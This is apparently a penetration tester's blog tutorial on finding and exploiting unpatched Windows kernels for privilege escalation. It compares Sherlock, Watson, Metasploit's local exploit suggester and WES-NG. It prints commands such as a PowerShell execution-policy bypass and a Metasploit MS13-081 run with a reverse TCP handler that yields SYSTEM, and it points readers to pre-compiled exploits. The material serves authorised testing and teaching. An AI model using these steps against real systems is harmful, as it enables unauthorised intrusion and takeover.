Windows Kernel Exploitation

There are several tools out there to check if there are known exploits against unpatched Windows Kernels. The most notable are listed below:

Each of these has their pros and cons. I will discuss them one by one and what they may be useful for:

Sherlock

Sherlock is a tool that was created by a user that goes by rasta-mouse. The project can be found here. The program only checks against some older known exploits, so this script may be useful against older Windows machines, or some CTF boxes. Currently the script checks for these exploits:

  • MS10–015 : User Mode to Ring (KiTrap0D)
  • MS10–092 : Task Scheduler
  • MS13–053 : NTUserMessageCall Win32k Kernel Pool Overflow
  • MS13–081 : TrackPopupMenuEx Win32k NULL Page
  • MS14–058 : TrackPopupMenu Win32k Null Pointer Dereference
  • MS15–051 : ClientCopyImage Win32k
  • MS15–078 : Font Driver Buffer Overflow
  • MS16–016 : ‘mrxdav.sys’ WebDAV
  • MS16–032 : Secondary Logon Handle
  • MS16–034 : Windows Kernel-Mode Drivers EoP
  • MS16–135 : Win32k Elevation of Privilege
  • CVE-2017–7199 : Nessus Agent 6.6.2–6.10.3 Priv Esc

To run the script, we can run the commands below:

c:\> powershell -ep bypass
c:\> Import-Module .\Sherlock.ps1
c:\> Find-AllVulns
...snip...Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable
...snip...

The script will check against all the known vulnerabilities. If you would like to manually exploit something that looks vulnerable, you can navigate here to get a list of pre-compiled exploits for these kernel versions. A lot of the time, the exploits will link you to an exploit on Exploit-DB that you can download and compile yourself.

Watson

Watson is the upgraded and updated version of Sherlock. Sherlock is depreciated, but Watson is updated monthly by rasta-mouse with new exploit checks. The pros to using Watson are you are going to get more accurate results and the project is updated frequently. Are there any cons? Kind of. Watson is harder to set-up before you use it. The reason is you have to precompile Watson specifically for the version of .NET being used on the target Windows machine because it uses C# instead of PowerShell. I will explain how to do this:

First you will need to get the version of .NET being used on the target machine. You can find the installed version in C:\windows\microsoft.net\framework\

PS > C:\windows\microsoft.net\framework\07/16/2016  09:23 AM    <DIR>          v1.0.3705
07/16/2016 09:23 AM <DIR> v1.1.4322
06/04/2018 02:07 PM <DIR> v2.0.50727
06/04/2018 02:07 PM <DIR> v3.0
06/04/2018 02:07 PM <DIR> v3.5
04/13/2019 10:44 AM <DIR> v4.0.30319

In this example, the target machine is using .NET version 4.0.

Next you will need to download the project from the Watson Github Page. The next steps need to be done on a Windows machine or a Windows VM using Visual Studio.

In Visual Studio, you will have the option to open a project folder. Select the Entire folder. Next On the right hand side you will see a file called watson.sln. Double click that to open up the project. Now you will Right click the Project Watson (step 1 in image) and select properties (step 2 in image). Under “application” (step 3), you can set the target framework to the version you would like which should be version 4.0 in our case.

We can now build the program which should be called Watson.exe. The .exe file will be found in the bin folder. This can now be copied over to the target machine and executed:

C:\> .\Watson.exe...snip...[*] Appears vulnerable to MS13-005
[>] Description: Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation.
[>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
[>] Notes: None.
...snip...

Watson will also provide suggested exploits and the links to them. You can navigate to these exploits and compile them for the machine. You can also find a list of pre-compiled exploits here.

Metasploit

With Metsaploit, you should already have a Meterpreter shell already opened for this to work. The tools we are going to use are post-exploit modules which means they are modules that are used after getting your initial foothold on the machine.

The module we will be using is post/multi/recon/local_exploit_suggester

To run this module, we can run the command below assuming we already have a Meterpreter shell:

Meterpreter> run post/multi/recon/local_exploit_suggester SHOWDESCRIPTION=true[*] Collecting local exploits for x86/windows...
[*] 28 exploit checks are being tried...
...snip...[*] exploit/windows/local/ms13_081_track_popup_menu: The target is vulnerable...snip...

After we have a list of possible exploits, we can search on Exploit-DB for an exploit and compile it, we can check out this list of pre-compiled exploits for Windows, or we can use the suggested Metasploit module. In the above example it gives us the exploit/windows/local_ms13_081_track_popup_menu module. To exploit this vulnerability, we can run these commands:

Metasploit> use exploit/windows/local/ms13_081_track_popup_menumsf exploit(windows/local/ms13_081_track_popup_menu) > optionsModule options (exploit/windows/local/ms10_092_schelevator):Name      Current Setting  Required  Description----      ---------------  --------  -----------CMD                        no        Command to execute instead of a payload
SESSION 1 yes The session to run this module on.
TASKNAME no A name for the created task (default random)
msf exploit(windows/local/ms13_081_track_popup_menu) > run[*] Started reverse TCP handler on 10.10.10.99:443...snip...meterpreter > getuiServer username: NT AUTHORITY\SYSTEM

Windows Exploit Suggester — Next Generation

Windows Exploit Suggester — Next Generation uses the output of systeminfo to determine a list of vulnerabilities the OS is vulnerable to. The project is updated frequently by the developer. The pros are it is easy to use, and it is updated frequently, the con to this tool is that you must have Python installed on the target Windows machine. Windows does not have Python installed by default so this could be a problem. First you will need to download a copy of the tool from here. The next steps are outlined pretty well on the documentation page so I will copy them word for word here:

  1. Obtain the latest database of vulnerabilities by executing the command wes.py --update.
  2. Use Windows’ built-in systeminfo.exe tool to obtain the system information of the local system, or from a remote system using systeminfo.exe /S MyRemoteHost, and redirect this to a file: systeminfo > systeminfo.txt
  3. Execute WES-NG with the systeminfo.txt output file as the parameter: wes.py systeminfo.txt. WES-NG then uses the database to determine which patches are applicable to the system and to which vulnerabilities are currently exposed, including exploits if available.
  4. As the data provided by Microsoft is frequently incomplete and false positives are reported by wes.py, make sure to check the Eliminating false positives page at the Wiki on how to deal with this. For an overview of all available parameters, check CMDLINE.md.

After the program has run, it will display a list of exploits and the link to the exploit. You can navigate to the page to download and compile the exploit yourself, or you can search here for a list of pre-compiled exploits that you can use.

I hope this post was useful. We went over several ways on how to search for Windows kernel vulnerabilities and how to exploit them. While one tool may work amazing for one situation, it may not work as well for a different situation. It never hurts to know how to do something more than one way.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Recipe For Root

Recipe For Root

I am a Security Consultant and formerly worked at PayPal as a Penetration Tester. At night I teach Cyber Security at UTexas. OSCP